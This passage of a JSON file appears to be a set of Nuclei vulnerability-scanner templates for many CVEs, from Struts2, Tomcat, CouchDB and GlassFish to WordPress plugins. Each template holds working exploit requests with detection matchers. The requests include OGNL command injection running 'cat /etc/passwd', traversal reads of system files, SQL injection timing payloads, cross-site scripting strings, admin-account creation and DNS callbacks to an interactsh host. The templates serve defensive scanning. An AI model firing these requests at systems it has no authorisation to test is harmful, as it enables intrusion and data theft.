Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","duration_2 - duration_1 >= 7","contains(content_type_2, \"text/html\")","contains(body_2, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your 